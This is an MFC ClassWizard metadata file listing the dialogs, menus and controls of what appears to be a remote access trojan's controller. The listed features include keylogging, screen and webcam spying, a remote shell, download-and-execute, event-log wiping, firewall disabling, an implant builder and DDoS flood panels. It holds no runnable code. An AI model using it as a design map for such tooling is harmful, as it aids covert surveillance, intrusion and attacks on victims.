; CLW file contains information for the MFC ClassWizard

[General Info]
Version=1
LastClass=CBuild
LastTemplate=CDialog
NewFileInclude1=#include "stdafx.h"
NewFileInclude2=#include "Client.h"
LastPage=0

ClassCount=28
Class1=CAudioDlg
Class2=CFileManagerDlg
Class3=CFileTransferModeDlg
Class4=CClientApp
Class5=CAboutDlg
Class6=CClientDoc
Class7=CClientView
Class8=CKeyBoardDlg
Class9=CMainFrame
Class10=CScreenSpyDlg
Class11=CShellDlg
Class12=CSystemDlg
Class13=CTrueColorToolBar
Class14=CWebCamDlg

ResourceCount=41
Resource1=IDD_DLLDLG
Resource2=IDD_SHELL
Resource3=IDR_REMOTE_VIEW
Resource4=IDD_SOCKS
Resource5=IDR_MAINFRAME
Resource6=IDR_ADSL_COPY
Resource7=IDD_UPDATE_DLG
Resource8=IDR_LOG
Resource9=IDD_DDOS_FLOOD
Resource10=IDD_WEBCAM
Resource11=IDR_TabCtrl
Resource12=IDR_MINIMIZE
Resource13=IDD_CHANGE_GROUP
Resource14=IDD_TRANSFERMODE_DLG
Resource15=IDD_ABOUTBOX
Resource16=IDR_WLIST
Resource17=IDR_SLIST
Resource18=IDD_BUILD
Class15=CSetting
Resource19=IDD_KEYBOARD
Class16=CBuild
Resource20=IDR_LIST
Class17=CChangeGroup
Resource21=IDD_DDOS_FLOOD1
Class18=CPcView
Class19=CDllDlg
Resource22=IDD_DDOS_DRDOS
Resource23=IDD_SETTING
Class20=CSysInfo
Resource24=IDR_TOOLBAR2
Resource25=IDD_DDOS_WEB
Resource26=IDR_LOCAL_VIEW
Resource27=IDR_REGL_MENU
Resource28=IDD_DDOS_WEB1
Resource29=IDD_SCREENSPY
Resource30=IDD_SYSTEM
Resource31=IDR_TOOLBAR1
Resource32=IDR_FILEMANAGER
Class21=CRegDlg
Class22=CRegDataDlg
Resource33=IDR_PSLIST
Resource34=IDD_REG_DIALOG
Class23=CUpdateDlg
Resource35=IDD_SYSINFO
Resource36=IDD_AUDIO
Resource37=IDR_ILIST
Class24=CDDOSFlood
Resource38=IDD_REGDATA_DLG
Class25=CDDOSFlood1
Class26=CDDOSWeb
Resource39=IDR_REGT_MENU
Class27=CDDOSWeb1
Class28=CDDOSDrDos
Resource40=IDD_FILE
Resource41=IDR_TOOLBAR4

[CLS:CAudioDlg]
Type=0
BaseClass=CDialog
HeaderFile=AudioDlg.h
ImplementationFile=AudioDlg.cpp
LastObject=CAudioDlg
Filter=D
VirtualFilter=dWC

[CLS:CFileManagerDlg]
Type=0
BaseClass=CDialog
HeaderFile=FileManagerDlg.h
ImplementationFile=FileManagerDlg.cpp
LastObject=CFileManagerDlg
Filter=D
VirtualFilter=dWC

[CLS:CFileTransferModeDlg]
Type=0
BaseClass=CDialog
HeaderFile=FileTransferModeDlg.h
ImplementationFile=FileTransferModeDlg.cpp
LastObject=CFileTransferModeDlg
Filter=D
VirtualFilter=dWC

[CLS:CClientApp]
Type=0
BaseClass=CWinApp
HeaderFile=Client.h
ImplementationFile=Client.cpp
LastObject=CClientApp

[CLS:CAboutDlg]
Type=0
BaseClass=CDialog
HeaderFile=Client.cpp
ImplementationFile=Client.cpp
LastObject=CAboutDlg
Filter=D
VirtualFilter=dWC

[CLS:CClientDoc]
Type=0
BaseClass=CDocument
HeaderFile=ClientDoc.h
ImplementationFile=ClientDoc.cpp
LastObject=CClientDoc

[CLS:CClientView]
Type=0
BaseClass=CView
HeaderFile=ClientView.h
ImplementationFile=ClientView.cpp
LastObject=CClientView
Filter=C
VirtualFilter=VWC

[CLS:CKeyBoardDlg]
Type=0
BaseClass=CDialog
HeaderFile=KeyBoardDlg.h
ImplementationFile=KeyBoardDlg.cpp
LastObject=IDC_CLEAN_LOG
Filter=D
VirtualFilter=dWC

[CLS:CMainFrame]
Type=0
BaseClass=CFrameWnd
HeaderFile=MainFrm.h
ImplementationFile=MainFrm.cpp
Filter=T
VirtualFilter=fWC
LastObject=CMainFrame

[CLS:CScreenSpyDlg]
Type=0
BaseClass=CDialog
HeaderFile=ScreenSpyDlg.h
ImplementationFile=ScreenSpyDlg.cpp
LastObject=CScreenSpyDlg

[CLS:CShellDlg]
Type=0
BaseClass=CDialog
HeaderFile=ShellDlg.h
ImplementationFile=ShellDlg.cpp
LastObject=CShellDlg

[CLS:CSystemDlg]
Type=0
BaseClass=CDialog
HeaderFile=SystemDlg.h
ImplementationFile=SystemDlg.cpp
LastObject=CSystemDlg
Filter=D
VirtualFilter=dWC

[CLS:CTrueColorToolBar]
Type=0
BaseClass=CToolBar
HeaderFile=TrueColorToolBar.h
ImplementationFile=TrueColorToolBar.cpp
LastObject=CTrueColorToolBar

[CLS:CWebCamDlg]
Type=0
BaseClass=CDialog
HeaderFile=WebCamDlg.h
ImplementationFile=WebCamDlg.cpp
LastObject=CWebCamDlg

[DLG:IDD_AUDIO]
Type=1
Class=CAudioDlg
ControlCount=5
Control1=IDC_AUDIO,button,1342177287
Control2=IDC_SEND_LOCALAUDIO,button,1342210051
Control3=IDC_STATIC,static,1342308352
Control4=IDC_STATIC,static,1342308352
Control5=IDC_TIPS,static,1342308352

[DLG:IDD_FILE]
Type=1
Class=CFileManagerDlg
ControlCount=6
Control1=IDC_LOCAL_PATH,combobox,1344340290
Control2=IDC_LIST_LOCAL,SysListView32,1350632257
Control3=IDC_REMOTE_PATH,combobox,1344340290
Control4=IDC_LIST_REMOTE,SysListView32,1350632265
Control5=IDC_STATIC,static,1342308352
Control6=IDC_STATIC_REMOTE,static,1342308352

[DLG:IDD_TRANSFERMODE_DLG]
Type=1
Class=CFileTransferModeDlg
ControlCount=9
Control1=IDC_TIPS,static,1342308352
Control2=IDC_OVERWRITE,button,1342242816
Control3=IDC_ADDITION,button,1342242816
Control4=IDC_JUMP,button,1342242816
Control5=IDC_OVERWRITE_ALL,button,1342242816
Control6=IDC_ADDITION_ALL,button,1342242816
Control7=IDC_JUMP_ALL,button,1342242816
Control8=IDC_CANCEL,button,1342242816
Control9=IDC_STATIC,button,1342177287

[DLG:IDD_ABOUTBOX]
Type=1
Class=CAboutDlg
ControlCount=10
Control1=IDC_STATIC,static,1342177283
Control2=IDOK,button,1342373889
Control3=IDC_STATIC,static,1342308352
Control4=IDC_STATIC,static,1342308352
Control5=IDC_STATIC,static,1342308352
Control6=IDC_STATIC,static,1342308352
Control7=IDC_STATIC,static,1342308352
Control8=IDC_STATIC,static,1342308352
Control9=IDC_STATIC,button,1342177287
Control10=IDC_STATIC,static,1342308352

[DLG:IDD_KEYBOARD]
Type=1
Class=CKeyBoardDlg
ControlCount=4
Control1=IDC_EDIT,edit,1352734788
Control2=IDC_GET_LOG,button,1342242816
Control3=IDC_CLEAN_LOG,button,1342242816
Control4=IDC_SAVE_LOG,button,1342242816

[DLG:IDD_SCREENSPY]
Type=1
Class=CScreenSpyDlg
ControlCount=0

[DLG:IDD_SYSTEM]
Type=1
Class=CSystemDlg
ControlCount=4
Control1=IDC_LIST_PROCESS,SysListView32,1350631425
Control2=IDC_TAB,SysTabControl32,1342177600
Control3=IDC_LIST_WINDOWS,SysListView32,1350631425
Control4=IDC_LIST_DIALUPASS,SysListView32,1350631425

[DLG:IDD_WEBCAM]
Type=1
Class=CWebCamDlg
ControlCount=0

[MNU:IDR_MAINFRAME]
Type=1
Class=CMainFrame
Command1=IDM_EXIT
Command2=IDM_BUILD
Command3=IDM_SETTING
Command4=IDM_IPUPDATE
Command5=ID_VIEW_TOOLBAR
Command6=ID_VIEW_STATUS_BAR
Command7=ID_APP_ABOUT
CommandCount=7

[MNU:IDR_LIST]
Type=1
Class=CPcView
Command1=IDM_FILEMANAGER
Command2=IDM_KEYBOARD
Command3=IDM_SCREENSPY
Command4=IDM_SYSTEM
Command5=IDM_WEBCAM
Command6=IDM_AUDIO_LISTEN
Command7=IDM_REMOTESHELL
Command8=IDM_SYSINFO
Command9=IDM_REGEDIT
Command10=ID_JINCHENG
Command11=ID_CHUANGKOU
Command12=ID_CHONGZHI
Command13=IDM_DOWNEXEC
Command14=IDM_OPEN_URL_HIDE
Command15=IDM_OPEN_URL_SHOW
Command16=IDM_CLEANEVENT
Command17=IDM_CLEAN_System
Command18=IDM_CLEAN_Security
Command19=IDM_CLEAN_Application
Command20=IDM_UPDATE_SERVER
Command21=IDM_IP
Command22=IDM_DILIXINXI
Command23=IDM_ALL
Command24=IDM_REMOVE
Command25=IDM_LOGOFF
Command26=IDM_REBOOT
Command27=IDM_SHUTDOWN
Command28=IDM_RENAME_REMARK
Command29=IDM_CHANGE_GROUP
Command30=IDM_SELECT_ALL
Command31=IDM_UNSELECT_ALL
CommandCount=31

[MNU:IDR_FILEMANAGER]
Type=1
Class=?
Command1=IDM_TRANSFER
Command2=IDM_RENAME
Command3=IDM_DELETE
Command4=IDM_NEWFOLDER
Command5=IDM_LOCAL_OPEN
Command6=IDM_REMOTE_OPEN_SHOW
Command7=IDM_REMOTE_OPEN_HIDE
Command8=IDM_REFRESH
CommandCount=8

[MNU:IDR_LOCAL_VIEW]
Type=1
Class=?
Command1=IDM_LOCAL_BIGICON
Command2=IDM_LOCAL_SMALLICON
Command3=IDM_LOCAL_LIST
Command4=IDM_LOCAL_REPORT
CommandCount=4

[MNU:IDR_REMOTE_VIEW]
Type=1
Class=?
Command1=IDM_REMOTE_BIGICON
Command2=IDM_REMOTE_SMALLICON
Command3=IDM_REMOTE_LIST
Command4=IDM_REMOTE_REPORT
CommandCount=4

[MNU:IDR_PSLIST]
Type=1
Class=CSystemDlg
Command1=IDM_KILLPROCESS
Command2=IDM_REFRESHPSLIST
CommandCount=2

[MNU:IDR_MINIMIZE]
Type=1
Class=?
Command1=IDM_SHOW
Command2=IDM_HIDE
Command3=IDM_EXIT
CommandCount=3

[TB:IDR_TOOLBAR1]
Type=1
Class=?
Command1=IDT_LOCAL_PREV
Command2=IDT_LOCAL_COPY
Command3=IDT_LOCAL_DELETE
Command4=IDT_LOCAL_NEWFOLDER
Command5=IDT_LOCAL_VIEW
Command6=IDT_LOCAL_STOP
CommandCount=6

[TB:IDR_TOOLBAR2]
Type=1
Class=?
Command1=IDT_REMOTE_PREV
Command2=IDT_REMOTE_COPY
Command3=IDT_REMOTE_DELETE
Command4=IDT_REMOTE_NEWFOLDER
Command5=IDT_REMOTE_VIEW
Command6=IDT_REMOTE_STOP
CommandCount=6

[DLG:IDD_CHANGE_GROUP]
Type=1
Class=CChangeGroup
ControlCount=4
Control1=IDOK,button,1342242817
Control2=IDCANCEL,button,1342242816
Control3=IDC_COMBO_GROUP,combobox,1344340226
Control4=IDC_ZITI,button,1342177287

[CLS:CChangeGroup]
Type=0
HeaderFile=ChangeGroup.h
ImplementationFile=ChangeGroup.cpp
BaseClass=CDialog
Filter=D
VirtualFilter=dWC
LastObject=CChangeGroup

[CLS:CPcView]
Type=0
HeaderFile=PcView.h
ImplementationFile=PcView.cpp
BaseClass=CXTPListView
Filter=C
LastObject=1107
VirtualFilter=VWC

[DLG:IDD_SOCKS]
Type=1
Class=?
ControlCount=1
Control1=IDC_EDIT,edit,1353781444

[CLS:CSysInfo]
Type=0
HeaderFile=SysInfo.h
ImplementationFile=SysInfo.cpp
BaseClass=CDialog
Filter=D
LastObject=CSysInfo
VirtualFilter=dWC

[DLG:IDD_SETTING]
Type=1
Class=CSetting
ControlCount=9
Control1=IDC_SETTINGS,button,1342177287
Control2=IDC_APPLY,button,1342242816
Control3=IDC_SETTINGS,static,1342308352
Control4=IDC_LISTEN_PORT,edit,1350639745
Control5=IDC_SETTINGS,static,1342308352
Control6=IDC_CONNECT_MAX,edit,1350639745
Control7=IDC_CONNECT_AUTO,button,1342275587
Control8=IDC_DISABLE_POPTIPS,button,1342275587
Control9=IDC_SHOWTIPS,static,1342308352

[CLS:CSetting]
Type=0
HeaderFile=Setting.h
ImplementationFile=Setting.cpp
BaseClass=CDialog
Filter=D
LastObject=CSetting

[DLG:IDD_BUILD]
Type=1
Class=CBuild
ControlCount=27
Control1=IDC_BUILD,button,1342242817
Control2=IDCANCEL,button,1342242816
Control3=IDC_HOST1,edit,1350631552
Control4=IDC_STATIC,static,1342308352
Control5=IDC_STATIC,static,1342308352
Control6=IDC_SERVICE_DISPLAYNAME,edit,1350631552
Control7=IDC_STATIC,static,1342308352
Control8=IDC_SERVICE_DESCRIPTION,edit,1350631552
Control9=IDC_STATIC,static,1342308352
Control10=IDC_PORT1,edit,1350631552
Control11=IDC_STATIC,static,1342308352
Control12=IDC_SERVICE_NAME,edit,1350631552
Control13=IDC_STATIC,static,1342308352
Control14=IDC_GROUP_NAME,combobox,1344340226
Control15=IDC_DNS,button,1342177287
Control16=IDC_SERVICE,button,1342177287
Control17=IDC_SPECIAL,button,1342177287
Control18=IDC_BIAOZHI,edit,1484849280
Control19=IDC_GREEN,button,1342242819
Control20=IDC_SERVICE2,button,1342177287
Control21=IDC_INSTALL_WAY,combobox,1344340227
Control22=IDC_STATIC,static,1342308352
Control23=IDC_VERSION,edit,1350631552
Control24=IDC_RANDOM,button,1342242816
Control25=IDC_QQ,button,1208025091
Control26=IDC_STATIC,static,1208090624
Control27=IDC_QQ_NUM,edit,1216413824

[CLS:CBuild]
Type=0
HeaderFile=Build.h
ImplementationFile=Build.cpp
BaseClass=CDialog
Filter=D
LastObject=IDC_VERSION
VirtualFilter=dWC

[DLG:IDD_SHELL]
Type=1
Class=?
ControlCount=1
Control1=IDC_EDIT,edit,1353781444

[MNU:IDR_ADSL_COPY]
Type=1
Class=CSystemDlg
Command1=IDM_ADSL_SAVE
Command2=IDM_REFRESHPSLIST
CommandCount=2

[MNU:IDR_SLIST]
Type=1
Class=CSysInfo
Command1=IDM_REFRESHPSLIST
Command2=IDM_ACTIVE_USER
Command3=IDM_DISABLEUSER
Command4=IDM_CHANGEPASSWORD
Command5=IDM_DELUSER
Command6=IDM_COPY
CommandCount=6

[MNU:IDR_WLIST]
Type=1
Class=CSysInfo
Command1=IDM_REFRESHPSLIST
Command2=IDM_DISCONNECT_USER
Command3=IDM_LOGOFF_USER
Command4=IDM_COPY
CommandCount=4

[MNU:IDR_ILIST]
Type=1
Class=CSysInfo
Command1=IDM_REFRESHPSLIST
Command2=IDM_COPY
CommandCount=2

[MNU:IDR_TabCtrl]
Type=1
Class=CClientView
Command1=ID_AddGroup
Command2=ID_DelGroup
CommandCount=2

[DLG:IDD_REGDATA_DLG]
Type=1
Class=CRegDataDlg
ControlCount=7
Control1=IDOK,button,1342242817
Control2=IDCANCEL,button,1342242816
Control3=IDC_STATIC,static,1342308352
Control4=IDC_PATH,edit,1350631552
Control5=IDC_STATIC,static,1342308352
Control6=IDC_KEY,edit,1350631552
Control7=IDC_STATIC,button,1342177287

[DLG:IDD_REG_DIALOG]
Type=1
Class=CRegDlg
ControlCount=2
Control1=IDC_TREE,SysTreeView32,1351680000
Control2=IDC_LIST,SysListView32,1350633473

[MNU:IDR_REGT_MENU]
Type=1
Class=?
Command1=IDM_REGT_DEL
Command2=IDM_REGT_CREAT
CommandCount=2

[MNU:IDR_REGL_MENU]
Type=1
Class=?
Command1=IDM_REGL_EDIT
Command2=IDM_REGL_DELKEY
Command3=IDM_REGL_STR
Command4=IDM_REGL_DWORD
Command5=IDM_REGL_EXSTR
CommandCount=5

[CLS:CRegDlg]
Type=0
HeaderFile=RegDlg.h
ImplementationFile=RegDlg.cpp
BaseClass=CDialog
Filter=D
LastObject=CRegDlg

[CLS:CRegDataDlg]
Type=0
HeaderFile=RegDataDlg.h
ImplementationFile=RegDataDlg.cpp
BaseClass=CDialog
Filter=D
LastObject=CRegDataDlg

[DLG:IDD_UPDATE_DLG]
Type=1
Class=CUpdateDlg
ControlCount=14
Control1=IDC_STATIC,button,1342177287
Control2=IDC_STATIC,static,1342308352
Control3=IDC_EDIT_DNSUSER,edit,1350631552
Control4=IDC_STATIC,static,1342308352
Control5=IDC_EDIT_DNSPASS,edit,1350631584
Control6=IDC_STATIC,static,1342181383
Control7=IDC_STATIC,static,1342308352
Control8=IDC_EDIT_DNSDOMAIN,edit,1350631552
Control9=IDC_STATIC,static,1342308352
Control10=IDC_COMBO_DNSIP,combobox,1344340226
Control11=IDC_BTN_DNSUPDATE,button,1342242817
Control12=IDC_SIGNNOIP,static,1342308352
Control13=IDC_SHOWTIPS,static,1342308352
Control14=IDC_GETWAN,button,1342242816

[CLS:CUpdateDlg]
Type=0
HeaderFile=UpdateDlg.h
ImplementationFile=UpdateDlg.cpp
BaseClass=CDialog
Filter=D
LastObject=CUpdateDlg

[DLG:IDD_DLLDLG]
Type=1
Class=CDllDlg
ControlCount=5
Control1=IDC_STATIC,static,1342308352
Control2=IDC_DLLSERVER,static,1342308352
Control3=IDC_STATIC,static,1342308352
Control4=IDC_DLLCLENTVER,static,1342308352
Control5=IDC_DLLDLG_PROGRESS,msctls_progress32,1350565888

[CLS:CDllDlg]
Type=0
HeaderFile=DllDlg.h
ImplementationFile=DllDlg.cpp
BaseClass=CDialog
Filter=D
LastObject=CDllDlg

[MNU:IDR_LOG]
Type=1
Class=?
Command1=IDM_EVENT_COPY
Command2=IDM_EVENT_DELETE
Command3=IDM_EVENT_SAVE
Command4=IDM_ALL_DELETE
CommandCount=4

[DLG:IDD_DDOS_FLOOD]
Type=1
Class=CDDOSFlood
ControlCount=32
Control1=IDC_FLOOD_DNS,edit,1350631552
Control2=IDC_FLOOD_PORT,edit,1350631552
Control3=IDC_COMBO_FLOOD_MODLE,combobox,1344340227
Control4=IDC_FLOOD_THREAD,edit,1350631552
Control5=IDC_SPIN_FLOOD_THREAD,msctls_updown32,1342177443
Control6=IDC_FLOOD_TIME,edit,1350631552
Control7=IDC_SPIN_FLOOD_TIME,msctls_updown32,1342177443
Control8=IDC_FLOOD_HOSTNUM,edit,1350631552
Control9=IDC_SPIN_FLOOD_HOST,msctls_updown32,1342177443
Control10=IDC_CHECK_FLOOD_ONLINE,button,1342242819
Control11=IDC_CHECK_FLOOD_AUTO,button,1342242819
Control12=IDC_FLOOD_START,button,1342242817
Control13=IDC_FLOOD_STOP,button,1342242816
Control14=IDC_STATIC,button,1342177287
Control15=IDC_STATIC,static,1342308352
Control16=IDC_STATIC,static,1342308352
Control17=IDC_STATIC,static,1342308352
Control18=IDC_STATIC,static,1342308352
Control19=IDC_STATIC,static,1342308352
Control20=IDC_STATIC,static,1342308352
Control21=IDC_STATIC,static,1342308352
Control22=IDC_STATIC,static,1342308352
Control23=IDC_STATIC,static,1342308352
Control24=IDC_STATIC,static,1342308352
Control25=IDC_STATIC,static,1342308352
Control26=IDC_STATIC,static,1342308352
Control27=IDC_STATIC,static,1342308352
Control28=IDC_STATIC,static,1342308352
Control29=IDC_SLECT_ALL,button,1342242816
Control30=IDC_SLECT_NOW,button,1342242816
Control31=IDC_UNSLECT_ALL,button,1342242816
Control32=IDC_UNSLECT_NOW,button,1342242816

[DLG:IDD_DDOS_WEB]
Type=1
Class=CDDOSWeb
ControlCount=32
Control1=IDC_WEB_DNS,edit,1350631552
Control2=IDC_WEB_PORT,edit,1350631552
Control3=IDC_COMBO_WEBMODLE,combobox,1344340227
Control4=IDC_WEB_THREAD,edit,1350631552
Control5=IDC_SPIN_WEB_THREAD,msctls_updown32,1342177442
Control6=IDC_WEB_TIME,edit,1350631552
Control7=IDC_SPIN_WEB_TIME,msctls_updown32,1342177442
Control8=IDC_WEB_HOSTNUM,edit,1350631552
Control9=IDC_SPIN_WEB_HOST,msctls_updown32,1342177442
Control10=IDC_CHECK_WEB_ONLINE,button,1342242819
Control11=IDC_WEB_CC1,edit,1350631552
Control12=IDC_WEB_CC2,edit,1350631552
Control13=IDC_CHECK_WEB_AUTO,button,1342242819
Control14=IDC_WEB_START,button,1342242817
Control15=IDC_WEB_STOP,button,1342242816
Control16=IDC_STATIC,button,1342177287
Control17=IDC_STATIC,static,1342308352
Control18=IDC_STATIC,static,1342308352
Control19=IDC_STATIC,static,1342308352
Control20=IDC_STATIC,static,1342308352
Control21=IDC_STATIC,static,1342308352
Control22=IDC_STATIC,static,1342308352
Control23=IDC_STATIC,static,1342308352
Control24=IDC_STATIC,static,1342308352
Control25=IDC_STATIC,static,1342308352
Control26=IDC_STATIC,static,1342308352
Control27=IDC_STATIC,static,1342308352
Control28=IDC_STATIC,static,1342308352
Control29=IDC_SLECT_ALL2,button,1342242816
Control30=IDC_SLECT_NOW2,button,1342242816
Control31=IDC_UNSLECT_ALL2,button,1342242816
Control32=IDC_UNSLECT_NOW2,button,1342242816

[DLG:IDD_DDOS_DRDOS]
Type=1
Class=CDDOSDrDos
ControlCount=19
Control1=IDC_DRDOS_ADDR,edit,1350631552
Control2=IDC_DRDOS_DNS,edit,1350631552
Control3=IDC_DRDOS_TIME,edit,1350631552
Control4=IDC_SPIN_DRDOS_TIME,msctls_updown32,1342177443
Control5=IDC_DRDOS_HOSTNUM,edit,1350631552
Control6=IDC_SPIN_DRDOS_HOST,msctls_updown32,1342177443
Control7=IDC_CHECK_DRDOS_ONLINE,button,1342242819
Control8=IDC_CHECK_DRDOS_AUTO,button,1342242819
Control9=IDC_DRDOS_START,button,1342242817
Control10=IDC_DRDOS_STOP,button,1342242816
Control11=IDC_STATIC,static,1342308352
Control12=IDC_STATIC,static,1342308352
Control13=IDC_STATIC,static,1342308352
Control14=IDC_STATIC,static,1342308352
Control15=IDC_STATIC,button,1342177287
Control16=IDC_SLECT_ALL,button,1342242816
Control17=IDC_SLECT_NOW,button,1342242816
Control18=IDC_UNSLECT_ALL,button,1342242816
Control19=IDC_UNSLECT_NOW,button,1342242816

[CLS:CDDOSFlood]
Type=0
HeaderFile=DDOSFlood.h
ImplementationFile=DDOSFlood.cpp
BaseClass=CFormView
Filter=D
LastObject=CDDOSFlood
VirtualFilter=VWC

[DLG:IDD_DDOS_FLOOD1]
Type=1
Class=CDDOSFlood1
ControlCount=32
Control1=IDC_FLOOD_DNS,edit,1350631552
Control2=IDC_FLOOD_PORT,edit,1350631552
Control3=IDC_COMBO_FLOOD_MODLE,combobox,1344340227
Control4=IDC_FLOOD_THREAD,edit,1350631552
Control5=IDC_SPIN_FLOOD_THREAD,msctls_updown32,1342177443
Control6=IDC_FLOOD_TIME,edit,1350631552
Control7=IDC_SPIN_FLOOD_TIME,msctls_updown32,1342177443
Control8=IDC_FLOOD_HOSTNUM,edit,1350631552
Control9=IDC_SPIN_FLOOD_HOST,msctls_updown32,1342177443
Control10=IDC_CHECK_FLOOD_ONLINE,button,1342242819
Control11=IDC_CHECK_FLOOD_AUTO,button,1342242819
Control12=IDC_FLOOD_START,button,1342242817
Control13=IDC_FLOOD_STOP,button,1342242816
Control14=IDC_STATIC,button,1342177287
Control15=IDC_STATIC,static,1342308352
Control16=IDC_STATIC,static,1342308352
Control17=IDC_STATIC,static,1342308352
Control18=IDC_STATIC,static,1342308352
Control19=IDC_STATIC,static,1342308352
Control20=IDC_STATIC,static,1342308352
Control21=IDC_STATIC,static,1342308352
Control22=IDC_STATIC,static,1342308352
Control23=IDC_STATIC,static,1342308352
Control24=IDC_STATIC,static,1342308352
Control25=IDC_STATIC,static,1342308352
Control26=IDC_STATIC,static,1342308352
Control27=IDC_STATIC,static,1342308352
Control28=IDC_STATIC,static,1342308352
Control29=IDC_SLECT_ALL,button,1342242816
Control30=IDC_SLECT_NOW,button,1342242816
Control31=IDC_UNSLECT_ALL,button,1342242816
Control32=IDC_UNSLECT_NOW,button,1342242816

[CLS:CDDOSFlood1]
Type=0
HeaderFile=DDOSFlood1.h
ImplementationFile=DDOSFlood1.cpp
BaseClass=CDialog
Filter=D
LastObject=CDDOSFlood1

[CLS:CDDOSWeb]
Type=0
HeaderFile=DDOSWeb.h
ImplementationFile=DDOSWeb.cpp
BaseClass=CFormView
Filter=D
LastObject=CDDOSWeb
VirtualFilter=VWC

[DLG:IDD_DDOS_WEB1]
Type=1
Class=CDDOSWeb1
ControlCount=32
Control1=IDC_WEB_DNS,edit,1350631552
Control2=IDC_WEB_PORT,edit,1350631552
Control3=IDC_COMBO_WEBMODLE,combobox,1344340227
Control4=IDC_WEB_THREAD,edit,1350631552
Control5=IDC_SPIN_WEB_THREAD,msctls_updown32,1342177442
Control6=IDC_WEB_TIME,edit,1350631552
Control7=IDC_SPIN_WEB_TIME,msctls_updown32,1342177442
Control8=IDC_WEB_HOSTNUM,edit,1350631552
Control9=IDC_SPIN_WEB_HOST,msctls_updown32,1342177442
Control10=IDC_CHECK_WEB_ONLINE,button,1342242819
Control11=IDC_WEB_CC1,edit,1350631552
Control12=IDC_WEB_CC2,edit,1350631552
Control13=IDC_CHECK_WEB_AUTO,button,1342242819
Control14=IDC_WEB_START,button,1342242817
Control15=IDC_WEB_STOP,button,1342242816
Control16=IDC_STATIC,button,1342177287
Control17=IDC_STATIC,static,1342308352
Control18=IDC_STATIC,static,1342308352
Control19=IDC_STATIC,static,1342308352
Control20=IDC_STATIC,static,1342308352
Control21=IDC_STATIC,static,1342308352
Control22=IDC_STATIC,static,1342308352
Control23=IDC_STATIC,static,1342308352
Control24=IDC_STATIC,static,1342308352
Control25=IDC_STATIC,static,1342308352
Control26=IDC_STATIC,static,1342308352
Control27=IDC_STATIC,static,1342308352
Control28=IDC_STATIC,static,1342308352
Control29=IDC_SLECT_ALL2,button,1342242816
Control30=IDC_SLECT_NOW2,button,1342242816
Control31=IDC_UNSLECT_ALL2,button,1342242816
Control32=IDC_UNSLECT_NOW2,button,1342242816

[CLS:CDDOSWeb1]
Type=0
HeaderFile=DDOSWeb1.h
ImplementationFile=DDOSWeb1.cpp
BaseClass=CDialog
Filter=D
LastObject=CDDOSWeb1

[CLS:CDDOSDrDos]
Type=0
HeaderFile=DDOSDrDos.h
ImplementationFile=DDOSDrDos.cpp
BaseClass=CFormView
Filter=D
LastObject=CDDOSDrDos
VirtualFilter=dWC

[TB:IDR_TOOLBAR4]
Type=1
Class=?
Command1=IDM_FILEMANAGER
Command2=IDM_KEYBOARD
Command3=IDM_SCREENSPY
Command4=IDM_SYSTEM
Command5=IDM_WEBCAM
Command6=IDM_AUDIO_LISTEN
Command7=IDM_REMOTESHELL
Command8=IDM_SYSINFO
Command9=IDM_REGEDIT
Command10=IDM_IPUPDATE
Command11=IDM_SETTING
Command12=IDM_BUILD
Command13=IDM_EXIT
CommandCount=13

[DLG:IDD_SYSINFO]
Type=1
Class=CSysInfo
ControlCount=37
Control1=IDC_INFO_LIST,SysListView32,1350631425
Control2=IDC_ZITI,button,1342177287
Control3=IDC_USER,edit,1350631552
Control4=IDC_PASS,edit,1350631552
Control5=IDC_ADMIN,edit,1350631552
Control6=IDC_CREAT,button,1342242816
Control7=IDC_STOP_FIRE,button,1342242816
Control8=IDC_ZITIA,button,1342177287
Control9=IDC_PORT,edit,1350631552
Control10=IDC_CHANGE,button,1342242816
Control11=IDC_GUEST,button,1342242816
Control12=IDC_ADDR,edit,1350631552
Control13=IDC_CONNECT,button,1342242816
Control14=IDC_ZITIA,button,1342177287
Control15=IDC_ZITIA,static,1342308352
Control16=IDC_ZITIA,static,1342308352
Control17=IDC_ZITIA,static,1342308352
Control18=IDC_ZITIA,static,1342308352
Control19=IDC_ZITIA,static,1342308352
Control20=IDC_PROXY_PORT,edit,1350639744
Control21=IDC_SOCKS5,button,1342275587
Control22=IDC_PROXY_USER,edit,1484849280
Control23=IDC_PROXY_PASS,edit,1484849312
Control24=IDC_ZITIA,static,1342308352
Control25=IDC_ZITIA,static,1342308352
Control26=ID_PROXY,button,1342242816
Control27=IDC_ZITIA,button,1342177287
Control28=IDC_REMOTE_PORT,edit,1350631552
Control29=IDC_OPEN3389,button,1342242816
Control30=IDC_CLOSE3389,button,1342242816
Control31=IDC_PROGRESS_3389,msctls_progress32,1350565888
Control32=IDC_FORCE,button,1342242819
Control33=IDC_LAN_CONNECT,button,1342242816
Control34=IDC_SYSTEM_TAB,SysTabControl32,1342177280
Control35=IDC_LIST_SEV,SysListView32,1350631425
Control36=IDC_LIST_WTS,SysListView32,1350631425
Control37=IDC_ONLINE_INFO_LIST,SysListView32,1350631425

